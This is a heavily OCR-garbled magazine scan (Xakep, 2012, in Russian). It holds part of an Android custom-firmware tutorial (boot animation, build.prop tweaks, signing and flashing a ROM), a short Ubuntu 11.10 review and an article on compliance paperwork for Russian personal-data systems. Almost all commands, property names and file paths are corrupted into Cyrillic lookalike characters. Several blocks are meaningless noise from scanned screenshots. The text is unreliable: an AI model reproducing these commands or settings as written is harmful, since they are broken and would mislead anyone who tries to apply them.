$_сб_Ѵ1:тр 

$ ткбіг ЬооТапітаІііоп; сб Ьоо1:апіта1:іоп 



В результате в текущем каталоге должен появиться каталог 
Ітатеѵѵогк-гез, содержащий все файлы пакета. Наиболее интерес- 
ные подкаталоги внутри него — это гез/бгаѵѵаЫе-* и гез/іауоиі-*. 
Первый содержит все графические элементы в виде рпд-файлов 
для разных разрешений и положений экрана. Например, бгаѵѵаЫе- 
Іапб-тбрі — это каталог с графическими ресурсами для экранов 
среднего разрешения, находящихся в горизонтальном положении 
(во время поворота экрана ОС переключается на использование 
других файлов). Разумеется, любой файл можно отредактировать 
или заменить другим. 



СОБСТВЕННУЮ ПРОШИВКУ ЧАЩЕ 
ВСЕГО СОЗДАЮТ ДЛЯ ТОГО, ЧТОБЫ 
ИЗМЕНИТЬ ВНЕШНИЙ ОБЛИК 
АЙОВОЮ ПО СВОЕМУ ВКУСУ 
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С 1 оскшогкНосІ Ресоѵегу ѵ2.5.0Л 

- геЬооі зузіет поы 

сірр І.у ; ісісаг (I : ирсіа Іе . гір 

- ыіре ЦаІа/ГвсТогу гезеі 

- ыіре еасііе рагііііоп 
іпзіѳіі гір ^гот зсісагб 

- папсігоісі 

- рагііііопз теті 

- асЬалсеб 



СіоскуогкМосІ Песоѵегу ѵ2.5.0,1 



СІоскѵѵогкМосІ Ресоѵегу: касюмное меню восстановления для АпсІгоісІ 



$ ипгір ~/гош/5у5І:ет/тесІіа/Ьоо1:апіта1:іоп. гір 

Внутри находится файл сІезсТхЦ описывающий анимацию в сле- 
дующем формате: 

Ширина Высота РР5 
р Порядок Пауза Каталог 



Стандартный вид этого файла: 
480 800 30 



■ *>л-*іч р^вр дич^Ьс мР 1 



гі Іо 1 1Ьра-№и'ш|1мл | Ь ш/ И ігі ]мі ІтГъ.м 
гіічміісн ѵпкгЗ іЬі' к ІІг 1 1 тіігші» I я 
и 1-ш.і рірі .№-.ЁК- /црі пг,- 1 іГ-іЛІ :Ы>ігг | | ,ш 
г|іа. №Лі^ 

о.іг ісс 

I ВѴІЯУІІ КІ4ИГГ 

1 Л о сит х іпт. 

** , 1*[|рЧ1Н| М<4ѵІ I Л*МгЫ 

«ЗНЛпЛН-ТВШ 1 ІІЫІІПІ 

I Та** Ьсіинл кгпі кп — _ііні и. Йвчр М Мірі Іа иіпіикп Іміі-г-у 

I ТЪ|? л ГТіт: Іі кН*- Г.пг Іл ь*іігЬ Пит г .ж -г гги-Ухтпі ттт рэкпІЭ. 

I ЕиІ іик л с Ш Г аі*т. 
ыШ іирр 1 I еепі .■кю. I * 1Ъ 

I ТЫ СИЯЛ С5 ЙРЭ ІГ№( Ичі л ** Ші 

I ТТпзз 19 -з ІЬ.ІЬ ІіітЭ рч і п | іиіхг 
« твѵѵ 



Стандартный ЬиіІсІ.ргор для Моіогоіа йе^у 



выставить значение РР5 24): 

$ тріаѵег -поБоипсІ -ѵо рп§:г=9 ѵісіео.аѵі 

Но и это будет лишним. Участники форума хсіа -сіеѵеіорегз 
наделали столько анимаций, что необходимость работы руками 
отпадает вовсе. Ссылки на интересные анимации приведены в 
конце статьи. 



НИЗКОУРОВНЕВЫЕ НАСТРОЙКИ 



Последнее, о чем я хотел бы рассказать в статье, — это редак- 
тирование низкоуровневых настроек. В АпсІгоісІ для этого есть 
файл зузІет/ЬиіИ.ргор, который хранит информацию о сборке 
прошивки и настройки для конкретных устройств. Добавив в этот 
файл те или иные строки, можно изменить функционирование 
АпсІгоісІ, ускорить его работу или уменьшить расход батареи. Ниже 
приведены наиболее интересные настройки. 

1. Запрет выгрузки рабочего стола из памяти: 

го . Н0МЕ_АРР_А03=1 



Опция позволяет сделать работу с устройством более удобной 
за счет мгновенного доступа к рабочему столу в любое время. 
Не рекомендуется использовать для устройств с малым 
объемом памяти. 

2 . Повышение качества сохраняемых бРО-файлов: 
го.тебіа.епс. дре§.диа1і1:у=100 



р 1 0 раг1:0 
р 0 0 рагііі 



Позволяет сделать снимки камеры более четкими, но суще- 
ственно повышает нагрузку на ЦП. 




Это значит, что изображение имеет размер 480 х 800, а ско- 
рость смены изображений (РР5) составляет 30 штук/с. Далее 
идет описание первой части анимации, файлы которой находятся 
в каталоге рагШ. Она проигрывается один раз (цифра 1 после 
р). Следующая часть (рагіі) проигрывается бесконечное число 
раз, пока аппарат не загрузится. Обычно каталог рагШ содер- 
жит изображения, соответствующие первой части анимации, а 
рагШ — все остальные изображения, которые проигрываются в 
цикле. Сами изображения должны быть одинакового размера, а 
их названия должны содержать числа в возрастающем порядке, 
например 0001. рпд, 0002. рпд и т. д. 

Так как анимация загрузки имеет очень простой формат, ее 
довольно легко сделать. Достаточно преобразовать видеоролик 
в рпд-изображения с помощью тепсобег (в безс.М необходимо 



3. Отключение анимации загрузки для ускорения загрузки опера- 
ционной системы: 

беЬи§. 5-Р. поЬоо1:апіта1:іоп=1 

4 . Возложение части работы по отри совке интерфейса на 6РСІ: 
беЬи§. зТ. бм=1 

Позволяет сделать интерфейс более быстрым и плавным. 

5 . Блокировка извещения об активном режиме отладки (при под- 
ключении к компу с помощью 115В): 

рег 5І5І * абЬ . по1:іТу=Ѳ 




ХАКЕР 01 /156/2012 
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рш. 5Іеер шосІе=1 

го. гіІ.сІІБаЫе. ромег. со11ар5е=Ѳ 

3. ТвикиЗО-модуля: 

го. гі1.ІіБхра=2 

ГО. ГІ1. ^ рГ5СІ аБ 5=10 
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го. гіі. 61: стаз км1= 14449 

го . гіі . ІіБира . саіе§огу=5 

4. Улучшение производительности сети: 





ІІІІІ 




Распаковываем Ргатеѵѵогк-геБ.арк 



пеі Лер. Ьи-р-РегБІге . сІе-Раи1і=4096 , 87380 , 256960 , 4096 , 16384 , 256960 
пеі . іер . Ьи-р-РегБІіе . міб=4096, 87380, 256960, 4096, 16384, 256960 
пеі . іер . Ьи-р-РегБІіе . иті5=4096, 87380, 256960,4096, 16384, 256960 
пеі . іер . Ьи-Р-РегБІге . §ргз=4096, 87380, 256960,4096, 16384, 256960 



> 1 5 -1 




итога 1 с іВй 






1 Лт 


ЙТы КГ-ИГ-К 


Э Лп 


сігіі>г-хг-к 


13 Лт 


> І5 -] 


итога 46 




6гіл:г-хг"К 


2 Ли 




2 


І'-Ч 1*1 р*— 


1 Лт 




ЕЗ ^1I^ 


гігикг-хг-н 


2 Лт 




? 


йг уиГ-"?Г“ч 


7 ^ ііті 


іігуиг-иг-к 


3 ііт 


(ІГи«Г-ХГ"іг 


э л» 


йгыкг-уг-н 


7 ;]т 


йпмг -мг -к 


Э ^3а 


Йг 1 ухГ-мГ-к 


2 ІІШ 


> 1 





ілм“5 І5415ЙМ . 

КМГ» 4ВД& иОйЬ- 
цщяп-к 4ВЧЁ нгіяРі . 



імЫГѢ 




кѵ&Б. 


б 


№4 






5 


ІЛВГ 3 


3590 




яд 




4 В96 




0 


ь-зегБ 


*ть 


новй. 


и 


ЧМГЕ 




нй»Б. 


10 




4695 


ИПФ(6. 


9 


ІІБ4ГК 


■1095 


нояБ. 


В 


іяегі 


4896 




в 


ьгаегя 


4095 




и 


иигк 


409Ё 


ЬйаіБ. 


п 


ѵт* 


4695 


МПЁ. 


6 



39 ?ЯЙЙ Ьааі . Ілцз 

6 1Б-ЭЗ ■уяіит 



] 6 : _ТГа йрр 

1$-,п Ы П 

Я ЕВЕ Ьиі ] гі „ргер 

і&іээ еіе 

1Ь:ЗЭ Топіэ 
І?;15 ^гдімивгк 
Іб;ЗЭ ПЬ 
15:33 шйів 
1БГЭЭ і*е 
16:33 шг 
16:33 ѵвпйаг 
1б:ЭЭ кЫп 



пеі . іер . Ьи-Р-Рег5І2е . есІ§е=4096, 87380, 256960,4096, 16384, 256960 



Все эти строки необходимо просто поместить в файл зузіет/ 
ЬиіИ.ргор и сохранить. 



СБОРКА 



ОК, мы внесли необходимые изменения, внедрили свои приложе- 
ния, твикнули систему и теперь должны создать готовый к прошив- 
ке образ ОС. В этом нам поможет утилита Іезізідп. Сначала следует 
запаковать прошивку с помощью 2 Ір: 



I 




$ ссі ~/гот; гір -г тѵ-гот. 2 Ір * 

Теперь необходимо подписать архив, чтобы Ресоѵегу смог его 
установить: 

$ ц§е1: 800.%1/ОуВВк 

$ даѵа -сІазБраІіІі іѳбіібі^п. даг іѳбіібі^п \ 
ту-гоітк 2 Ір ту-гот-5І§песІ . гір 




Свежераспакованная прошивка 

6. Устранение проблемы с возникновением черного экрана после 
завершениязвонка: 

го . 1§е . ргохітіііу . сІе1ау=25 
тоі . ргохітііу . сІе1ау=25 

7. Включение подсветки клавиш управления сразу после включе- 



После этого закидываем архив ту-гот-зідпесІ. 2 Ір на карту 
памяти устройства и выключаем аппарат. Чтобы попасть в 
Ресоѵегу, включаем аппарат с зажатой клавишей уменьшения 
громкости (для некоторых устройств процедура может отличать- 
ся]. 

Далее с помощью клавиш управления громкостью выбираем 
пункт «ѴѴіре баІа/ГасІогу гезеі», нажимаем клавишу включения 
(в Ресоѵегу это аналог <Еп1ег>), выбираем Уез и снова жмем 
<Еп1ег>. 




ш 1 1 




ния экрана: 

го . тоі . Ьиііопіі^іті: . іітеои1:=0 

Помимо всего этого, многие пользователи также рекомендуют 
применять следующие комбинации флагов: 



Теперь переходим в пункт «ІпзІаІІ гір ітот зсісагсі», а затем в 
«СЬоозе 2 Ір ітот зсісагсі», находим ту-гот-зідп. 2 Ір на 50-карте 
и выбираем Уез. После завершения установки выбираем «РеЬооІ 
зузіет поѵѵ». 



ВЫВОДЫ 




1. Уменьшение времени отклика сенсорного экрана: 

сІеЬи§. регТогтапсе.1:ипіп§=1 
ѵісіео . ассеіегаіе . бм=1 
ыіпсіоыбш^г . тах еѵепІіБ рег зес=150 

2. Увеличение времени жизни батареи: 




АпсІгоісІ — гибкая платформа, и в этой статье описаны далеко не 
все возможности по ее модификации. 

Более глубокая модификация может включать в себя заме- 
щение ядра, изменение экрана блокировки и стандартных при- 
ложений, активацию таких возможностей, как автоматическая 
установка приложений на карту памяти, внедрение механизма 
загрузочных скриптов (/еіс/іпіі.сі), и многое другое. 

Обо всем этом мы поговорим в следующих статьях. ПЕ 












Мини-обзор ІІЬипІи 11.10 



МИНИ-ОБЗОР 
ішіжти 11.Ю 

Опеігіс Осеіоі (Мечтательный оцелот) — это 15-й выпуск Ыпих-дистрибутива от СапопісаІ. В качестве 
рабочей оболочки по умолчанию используется Ііпііу. Кроме традиционного Сй-, теперь предлагается 
ОѴО-образ (размером 1,5 Гб), который включает все языковые пакеты и некоторые дополнительные 
приложения (Іпквсаре, 6ІМР, Ріііѵі и полный вариант ЫЬгеОІГісе). Сам 150-образ стал гибридным и 
поддерживает установку как на СО/ОѴй, так и на 115В РІазб. 





ДИСТРИБУТИВ СОДЕРЖИТ 
МНОЖЕСТВО ОБНОВЛЕНИЙ ПО 



• Ыпих кегпеі 3.0.1; 

• новые версии пользовательской оболочки 
ІІпіІу4.12.0 и композитного менеджера 
СотрігО.9.6; 

• 6І\І0МЕ3.2; 

• поумолчанию используются браузер 
МогіІІа Рігеі'ох 7.0.1, почтовый клиентМогіІІа 
ТЬипсІегЬігсІ 7.0.1, менеджер входа ЫдЬШМ, 
утилита бэкапа Ое)а Оир, полностью пере- 
писанный твиттер-клиентСѵѵіЬЬег; 

• ЫЬгеОЛчсе 3.4.2; 

• РуіЬоп 3.2, ССС4.6.1, ВазЬ 4.2, СІІР5 1.5.0, 
Рібдіп 2.10.0, ІЮЕѴ173,Х.Огд 1.10.4; 

• поддержка АРМ-архитектуры «из коробки». 



ИЗ ЗАМЕТНЫХ ИЗМЕНЕНИЙ: 



Кнопку ІІЬипІи (йазЬ Ноте) вернули на 
панель І_аипсЬег. Концепция РІасез, не 
подходившая многим пользователям, заменена 
на І_епзез, которая позволяет осуществлять поиск 
сразу по множеству источников информации (в 
установленных приложениях, локальных файлах, 
закладках, твиттере или (Зоодіе йосз) поддер- 
живает расширенные возможности фильтрации, 
позволяет присваивать объектам рейтинг и раз- 
бивать их на категории. При такой организации 
объекты стало проще находить и запускать. 

□ Новый переключатель окон по <АІНТаЬ>. 

Теперь из одного окна в другое можно 
переходить с помощью клавиш курсора «Влево» 
и «Вправо». Если окна не помещаются на экране, 



они сворачиваются в «гармошку». Окна одного и 
того же приложения группируются (группа рас- 
крывается с помощью клавиши «Вниз»). Кроме 
этого, иконки всех запущенных приложений 
складываются в І_аипсЬег. 

Оболочка Ііпііу занимает минимальное 
пространство, просто «обтекая» окно при- 
ложения. Когда окно развернуто до максимума, то 
кнопки управления окном, которые по умолчанию 
расположены слева, и меню приложения ото- 
бражаются, только если навести курсор мыши на 
заголовок окна. 

ІІЬипІи БоГСѵѵаге Сепіег 5.0 с полностью 
обновленным интерфейсом упрощает 
управление программным обеспечением и поиск. 
Список приложений, группируемых по категори- 
ям, формируется динамически, в зависимости от 
рейтинга, даты обновления и имени. В главном 
окне выводятся лучшие приложения, рядом с 
которыми отображается графический баннер 
для выделения новых интересных приложений. 
Дополнительно можно применить несколько 
фильтров репозиториев (официальный пакет 
ІІЬипІи, пакеты партнеров и т. п.) В БоНѵѵаге 
Сепіег интегрирован сервис ОпеСопС который 
можно использовать для синхронизации про- 
грамм, установленных на разных компьютерах 
(Рііе > 5упс Ьеіѵѵееп сотриіегз...). 

В базовую поставку добавлены библиотека 
01 и упрощенная оболочка Ііпііу 20, не тре- 
бующая современных видеокарт и способная рабо- 
тать без поддержки 0реп6І_. Код Ііпііу 20 создан с 
использованием 01 и технологии декларативного 
описания интерфейса 01 Оиіск. Оболочка Ііпііу 2й 








должна запускаться в тех случаях, когда невоз- 
можно использовать Ііпііу Зй, она разработана для 
виртуальных машин и призвана служить базовым 
интерфейсом для нетбуков на базе АРМ. 



□ Предложен инструмент для ІІЬипІи І_оСо 

( доо.дІ/сС5к , пакет иЬипШ-беіъиІІз-ЬиіІсІег), 
позволяющий самостоятельно создавать лока- 
лизованные сборки с адаптацией настроек для 
разных регионов: закладок в браузере, ссылок 
на поисковики, стартовой страницы, фонового 
изображения, мультимедиакодеков, ссылок на 
местные интернет-радиостанции в ВапзЬее и 
РЬуіЬтЬох и многого другого. 



□ В серверной сборке значительно усилена 
поддержка различных сіоиб-платформ и 
усовершенствованы механизмы для развертыва- 
ния систем виртуализации. 



ПРИМЕЧАНИЯ 



• Оцелот — хищное млекопитающее из семейства 
кошачьих, обитающее в Латинской Америке. 
Этот вид находится на грани исчезновения. 

• СаппопісаІ будетобеспечивать поддержку дис- 
трибутива до апреля 2013 года. 

• Релиз ІІЬипШ 1 2.04, выпуск которого намечен 
на апрель 201 2 года, выйдетв виде І_Т5-версии, 
то есть будет обеспечиваться поддержкой в 
течение пяти лет. 
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Никита Дыминский ака ІЗог 




ІѴІѴІѴІ 

Для создания 
максимально 
полного пакета 
документов на 
ИСПДн может 
пригодиться сайт 
дзсепіг.ги — их 
продукт 65Рй 
позиционируется 
именно как 
инструмент для 
быстрой разработки 
документов. К 
сожалению, про 
его качество и 
актуальность не 
могу ничего сказать, 
так как в бесплатную 
демо-версию входят 
только самые общие 
формы. 



Бумажная работа 
безопасника 



ЖУТКАЯ СТАТЬЯ О ЖУТКОЙ БЮРОКРАТИИ 
В РАБОТЕ СПЕЦИАЛИСТА ПО ИБ 

Главная проблема защиты информации в России — это необходимость возни с бумагами. 
Фактически написание бумаг — это и есть основная часть работы по защите информации, 
причем основная не только в плане объема (а писать придется действительно много чего), 
но и важности. К сожалению, регулирующие органы проверяют не столько выполнение 
технических требований по защите информации, сколько организационное обеспечение. По 
этой причине подойти к данному вопросу стоит со всей тщательностью. 
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Бумажная работа безопасника 



□ ля начала стоит разобраться, какая нормативная документация 
может нам помочь. Во-первых, это Специальные требования 
и рекомендации по технической защите конфиденциальной 
информации (СТР-К). Раньше на этом документе стояла пометка «Для 
служебного пользования», но сейчас его очень просто найти в интер- 
нете. Кроме того, определяющими нормативными документами для нас 
являются два постановления правительства: №687 и 781. Рекомендую 
с ними ознакомиться. Ну а теперь стоит разобраться, для чего нужен 
каждый из этих документов. 

1 ) Положение по обработке персональных данных— определяет 
общий порядок обработки информации, порядок их получения, 
основание для их обработки, цели обработки, порядок работы с 
персональными данными (далее — ПДн) и прочие подобные вещи. 
По сути, это основополагающий документ: в нем мы отвечаем на 
вопросы «кто, как, зачем и на каком основании». 

2) Аналитический отчет (или отчет об обследовании) — в нем мы рас- 
сказываем, что рассмотрели всю нашу информационную систему 
и описываем, где нашли персональные данные, перечисляем их 
характеристики (объем и категория) и краткие характеристики си- 
стемы, где они обрабатываются. Тутже можно описать, какие меры 
уже были предприняты для ихзащиты. 

3) Частная модель угроз (ЧМУ) — определяет, какие угрозы безопас- 
ности ПДн были признаны актуальными и почему. Информации 
отом, как писать Частную модельугроз, в интернете более чем 
достаточно. Главное — не переборщить с признанием угроз неак- 
туальными. ЧМУ разрабатывается только для специальныхсистем, 
типовыеугрозы берутся из Положения о методах и способахзащиты 
информации в информационныхсистемах персональных данных, 
которое утверждено 58 приказом ФСТЭК. Прежде чем приниматься 
за ЧМУ, стоит ознакомиться с этим положением — возможно, все не 
так страшно, и можно будет обойтись без лишнего бумагомаратель- 
ства. 

4) Частное техническое задание — нужно, когда к работе по защите 
ПДн привлекается какой-либо интегратор, то есть далеко не 
всегда. Не перечисляя средства защиты, которые предполагается 
использовать, оно описывает иххарактеристики. ЧТЗ разрабатыва- 
ется только совместно с ЧМУ, для специальных ИСПДн. 

5) Акт обследования информационной системы персональныхдан- 
ных — базовый документ на определенную ИСПДн. Он описывает 
основныехарактеристики ИСПДн: объем/категорию обрабатывае- 
мых ПДн, количество пользователей, состав технических средств, 
характеристики помещения (или нескольких помещений) и исполь- 
зуемые средства защиты — и указывает, есть ли разделение прав 
доступа. Зачем нужны характеристики помещений? Они позволяют 
регулирующим органам убедиться, что кто угодно не может просто 
войти в кабинет и незаметноунести системный блок. 

6) Акт классификации информационной системы персональных 
данных — думаю, из названия этого документа ясно, что он собой 
представляет. :) Именно в нем мы указываем характеристики 
нашей ИСПДнки, а именно: категорию и объем обрабатываемых 
ПДн, характеристики безопасности (специальная/типовая), струк- 
туру (автономное рабочее место, локальная ИС, распределенная 
ИС), наличие подключения ксетям связи общего пользования и 
международного информационного обмена, режим обработки ПДн 
(многопользовательский/однопользовательский) и местонахожде- 
ниетехнических средств (в пределах РФ или нет). Последний пункт 
влияетна возможность применения криптухи. 

7) Акт классификации автоматизированной системы — классифици- 
рует нетолько ИСПДн, но и автоматизированную систему, в которую 
входит ИСПДн. Хотя если убрать ИСПДн, то АС классифицировать 
будетуже не нужно — информации, которую необходимозащищать, 
там не будет. Про классификацию АС можно прочитать в сноске. 

8) Технический паспорт — сводный документпо ИСПДн. Включает 
в себя фактически всю имеющуюся информацию: расположение, 
класс АС и ИСПДн, состав ОТСС, краткую характеристику (сведения 
о фиксации технических средств, характеристика обрабатываемой 



информации, характеристика программно-технической среды), 
состав средств защиты информации и состав программного обе- 
спечения. 

9) Списоклиц, допущенных к обработке информации в ИСПДн,— 

списоклюдей, которые работаютза компами, включенными в 
состав ИСПДн. 

10) Список лиц, допущенных ктехническому обслуживанию техни- 
ческихсредств ИСПДн, — сюда стоит включить всех, кто имеетхоть 
какое-то отношение к администрированию ИСПДн. Почему они не 
фигурируют в предыдущем перечне? Ну, формально они у нас не 
имеют доступа кобрабатываемой информации, такчто нечего им 
там делать. 

1 1 ) Перечень персональных данных, обрабатываемых в ИСПДн, — 

перечень всех персональных данных, обрабатываемых в ИСПДн, с 
указанием основания для обработки и сроков обработки. Перечень 
лучше сделать развернутый, то есть он должен включать не сведе- 
ния, предоставляемые по форме Т2 (для отдела кадров), а фамилию, 
имя, отчество, паспортные данные, дату и место рождения еіс. 

1 2) Описание технологического процесса обработки информации в 
ИСПДн — тоже довольно расплывчатый документ, в котором нужно 
рассказать, как происходит обработка информация. Не стоит писать, 
что «пользователь включает персональный компьютер путем ока- 
зания давления на специальную кнопку, расположенную на корпусе 
системного блока ПЭВМ». :) Нужно описать субъектов доступа него 
объекты, используемые средства защиты информации, выполняемые 
пользователями задачи (занесение анкетных данных пользователей в 
БДеІс), организацию разграничения доступа и указать, где приведены 
правила разграничения доступа (в Матрице доступа). В качестве при- 
ложений стоитуказатьзащищаемые ресурсы (перечислить персо- 
нальные данные и файлы с настройками ОС и средств защиты). 

1 3) Матрица доступа к информационным ресурсам информацион- 
ной системы персональных данных— укажи в форме матрицы, к 
каким папкам у каких пользователей какие права доступа. Не надо 
указывать все папки, которые есть на жестких дисках! Достаточно 
системных папок, папоксобрабатываемой информацией, ну и 
полномочий, предоставленных пользователям. 

14) Акт ввода ИСПДн в эксплуатацию — собственно, этот акт при- 
знает ИСПДн готовой к работе и вводит в эксплуатацию. Теперь 
она у тебя есть. 

1 5) Приказ о назначении администратора безопасности информа- 
ционныхсистем персональных данных— предполагается, что 
утебя есть специально обученный безопасник, который должен 
заниматься всеми этими вещами, и этот приказ закрепляетза ним 
ответственность за решение соответствующих задач. Поскольку 
такого человека, скорее всего, нет, ответственность падает на си- 
стемного администратора, а в особо запущенных случаях — на того, 
кто лучше всех разбирается, как работает компьютер. 

1 6) Приказ о назначении технической комиссии — все акты у нас 
подписываются комиссиями. Изначально, когда аттестация была 
обязательной, такая комиссия называлась Комиссией по подго- 
товке к аттестации. Кого в нее включать? В принципе, без разницы. 
Хватит председателя комиссии и двух-трех членов. Лучше всего, 
если председателем будетзаместитель начальника (сам начальник 
утверждает документы), а членами — начальники соответствующих 
отделов (которые обрабатывают ПДн) и сисадмин. Оптимальное 
решение — набрать комиссию из сотрудников техотдела. 

1 7) Инструкция администратору безопасности — определяет его 
права и обязанности. Если вкратце, то администратор обязан 
следитьза тем, чтобы средства защиты защищали, а средства вы- 
числительной техники вычисляли. Он также имеет правотребовать, 
чтобы пользователи выполняли инструкции по защите информа- 
ции, и вносить предложения по модернизации системы защиты 
информации. Кстати, все, для кого предназначаются инструкции, 
должны обязательно расписываться, что ознакомились сними, — 
это важно, не забудь. 

18) Инструкция пользователям информационных систем персо- 
нальных данных — примернотоже самое, что и инструкция для 
администратора. 
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5УЫХАСК 



1 9) Инструкция по парольной защите — из названия все понятно, 
но вот какими должны быть пароли? В решении этого вопроса 
нам поможет РД «АС. Защита АС от НСД», где относительно четко 
прописано, что для наших АС (а у нас, скорее всего, будет АС класса 
1 Г — см. сноску) требуется парольусловно-постоянного действия, 
имеющий длину не менее шести символов и включающий цифры 

и буквы. Чтозначит«паролиусловно-постоянного действия»? 

Ну, по идее, это значит, что они меняются только при наступлении 
каких-то событий: увольнении сотрудника, обнаружении факта 
НСД (несанкционированного доступа) и такдалее. Но обычно все- 
таки выставляется время действия пароля — 90 дней. Также стоит 
прописать, что пароль должен отличаться от предыдущих (пяти 
паролей хватит) хотя бы в нескольких символах. 

20) Инструкция по антивирусной защите — описывает, как мы защи- 
щаемся отвирусов. Кстати, по-умномуони называются вредо- 
носными программами — «вирусами». Предписывает проводить 



ИНСТРУКЦИЮ ПО ПАРОЛЬНОЙ 
ЗАЩИТЕ, МОЖНО ВКЛЮЧИТЬ В 
ИНСТРУКЦИЮ АДМИНИСТРАТОРУ 
И ПОЛЬЗОВАТЕЛЯМ. 



периодические проверки, проверять все файлы, поступающие в 

ИСПДн ит. д. 

Последние две инструкции, особенно инструкцию по парольной 
защите, можно включить в инструкцию администратору и пользова- 
телям. Вообще, инструкции писать довольно просто — достаточно 
вспомнить все, что ты должен делать как админ и чего ты ждешь от 
пользователей. При этом можно будет приструнить юзеров. :) Не всех, 
так хоть самых надоедливых — бухгалтеров и кадровиков. 

На самом деле, ресурсов с информацией о том, как писать документы 
по ИСПДнам, довольно много — от уже неоднократно упоминавшегося 
ІБРОІЧ.ПІІ до Хабрахабра — достаточно просто поискать. Другое дело, 
что в одном месте советуют одно, а в другом другое и абсолютно полной 
и достоверной информации о том, как это делать, нет нигде, даже в этой 
статье. Проблема защиты персональных данных в настоящее время 
осложняется еще и тем, что требования законодательства в этой области 
меняются с пугающей скоростью, и к моменту выхода статьи в печать 
что-то может уже быть по-другому. Поэтому я бы посоветовал принять к 
сведению все рекомендации, съездить на курсы по защите ПДн (их про- 
водит довольно много компаний, но я бы посоветовал курсы «Маскома» 
и «Информзащиты» — и там и там преподают именно практики, которые 
занимаются как раз защитой информации), а уже непосредственно в 
процессе работы не постесняться направить запрос в регулирующие 
органы. Только делать это лучше через юристов, чтобы обеспечить его 
корректность. Некоторые моменты тебе, опять же, сможет разъяснить 
юротдел, если он есть, — документы все-таки написаны не техническим, 
а юридическим языком. ЗЕ 



ЧТО ИЗ СЕБЯ ПРЕДСТАВЛЯЕТ ПОЛОЖЕНИЕ 
ПО ОБРАБОТКЕ ПЕРСОНАЛЬНЫХ ДАННЫХ? 



Положение имеет примерно следующую схему: 

1) Общие положения — тут указывается, в соответ- 
ствии с чем разрабатывается данный документ, 
цель его разработки, что он определяет, кем 
утверждается. 

2) Основные термины и определения — берутся из 
1 52-ФЗ, как и многое другое в этом документе. 

3) Обязанности оператора — можно брать прямо из 
1 52-ФЗ «О персональных данных». 

4) Права и обязанности сотрудников по обработке 
персональных данных — укажи, что сотрудники 
имеют право обрабатывать ПДн в соответствии 
со своими должностными обязанностями, при 
необходимость их уточнять и так далее. Обязан- 
ности сотрудников состоят в том, чтобы никому 
не сообщать ПДн, выполнять требования за- 
конов, постановлений правительства, приказов 
по организации и своих инструкций в части, 
касающейся ПДн, то есть выполнять требования 
по парольной и антивирусной защите. 

5) Общий порядок обработки персональных данных 
— здесь мы указываем следующее: 

а. На каком основании и при каких условиях произ- 
водится обработка персональных данных. Осно- 
ванием для обработки может являться Трудовой 
кодекс, закон «О записи актов гражданского 
состояния» и т. д. Спроси утех, кто занимается 
обработкой ПДн, — они должны знать, какой 
документ регламентирует их деятельность. 



б. С какой целью производится обработка персо- 
нальных данных — проще всего указать, что «с 
целью обеспечения основной деятельности», 
если, конечно, обработка ПДн не является 
частью основной деятельности, как у страховых 
компаний, медицинских учреждений и т. д. 

в. Источники получения персональных данных и 
условия, при которых этми источниками можно 
пользоваться, — по закону источником получе- 
ния ПДн может быть только сам их владелец, то 
есть человек, кроме некоторых случаев, которые 
касаются преимущественно МВД и прочих по- 
добных структур. Уточнять данные у третьих лиц 
можно только с согласия объекта ПДн. 

6) Порядок обработки персональных данных с ис- 
пользованием средств автоматизации — расска- 
зываем, что обрабатывать персональные данные 
с использованием средств автоматизации (чита- 
ем — на компьютере) можно только с соблюде- 
нием всех требований ГСЗИ (государственной 
системы защиты информации) и Частной модели 
угроз (если она разработана). 

7) Порядок обработки персональных данных без 
использования средств автоматизации — поря- 
док документооборота. Расспроси сотрудников 
ИСПДн, как они хранят документы, в которых 
фигурируют ПДн. Только не стоит писать, что 
документы валяются по столам, — это не- 
сколько не то, чего ждут от тебя регулирующие 
органы. 



8) Защита персональных данных — кто и как до- 
пускается к обработке ПДн, на каких условиях 
проводится обработка ПДн (выполняются ли 
требования по защите от НСД, предпринимаются 
ли меры по предотвращению доступа лиц, не 
имеющих допуска, к ПДн еіс). 

9) Порядок предоставления доступа к персональ- 
ным данным — здесь и далее можно просто 
переписывать соответствующие статьи из 

1 52-ФЗ. 

10) Порядок предоставления третьим лицам 
доступа к персональным данным — передача 
ПДн третьим лицам возможна только после 
получения письменного согласия субъекта 
ПДн, кроме случаев, оговоренных законода- 
тельством РФ. Под такими случаями понимают 
запросы из МВД, прокуратуры и тому подобных 
учреждений. 

11 ) Ответственность за нарушение требований по 
защите персональных данных — руководитель 
несет ответственность за допуск сотрудников 

к обработке ПДн, администратор безопасности 
— за обеспечение работоспособности средств 
защиты информации, пользователь — за вы- 
полнение инструкций, и каждый из них несет 
ответственность, предусмотренную действующим 
законодательством РФ. 

В конце документа должен находиться лист 

ознакомления. 
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Бумажная работа безопасника 



РАО 

ПО БЮРОКРАТИИ 
В ИНФОРМАЦИОННОЙ 
БЕЗОПАСНОСТИ 




ЧТО ТАКОЕ 
ОТСС И ВТСС? 

Если коротко, то ОТСС — это та техника, 
которая входит в состав рассматриваемой 
АС, а ВТСС — это все остальное, установленное 
в тех же помещениях. Как ты понимаешь, ОТСС 
одной ИСПДн для другой представляют собой 
ВТСС. И то и другое фиксируется, только если 
угроза утечки информации по каналу ПЭМИН 
была признана актуальной, однако в Положении 
о методах и способах защиты информации в 
информационных системах персональных 
данных эта угроза признается неактуальной для 
всех типовых ИСПДн, вне зависимости от 
класса. Именно поэтому состав ВТСС нигде не 
фигурирует. 

НАСКОЛЬКО ПОДРОБНО ЗАПОЛНЯТЬ 
ПЕРЕЧЕНЬ ОТСС? 

Максимально полно. Комплектующие 
можно не переписывать, но все осталь- 
ное — надо. Если ИСПДн состоит из одного 
компьютера, то в типовой список будут входить 
системный блок, монитор, клавиатура, мышь, 
принтер и бесперебойник. С сетью все сложнее. 
Если она выделена в физический сегмент, то в 
состав ОТСС стоит включить и все сетевое 
оборудование внутри этого сегмента, а если она 
выделено ѴЬАІМ'ами или вообще не выделена — 
то только компьютеры. Распределенную ИСПДн 
я бы порекомендовал разбить на несколько 



ИСПДн по территориальному признаку. В любом 
случае включать в список оборудование 
провайдера не придется. 

КОГДА ИСПДН СЧИТАЕТСЯ ТИПОВОЙ, 
А КОГДА — СПЕЦИАЛЬНОЙ? 

Если следовать нормативке, то типовая 
ИСПДн — это такая ИСПДн, к которой 
предъявляются требования только по конфиден- 
циальности информации, а доступность и 
целостность роли не играют. Как ты понимаешь, 
в жизни таких систем не бывает, так что все 
определяется бюджетом и желанием реализо- 
вать какой-то свой проект по защите информа- 
ции. В этом случае стоит написать ЧМУ и 
соответствующее ЧТЗ, где зашифровать нужное 
оборудование. 

ЕСЛИ ОПРЕДЕЛЯЮЩИМИ 
ХАРАКТЕРИСТИКАМИ ИСПДН 
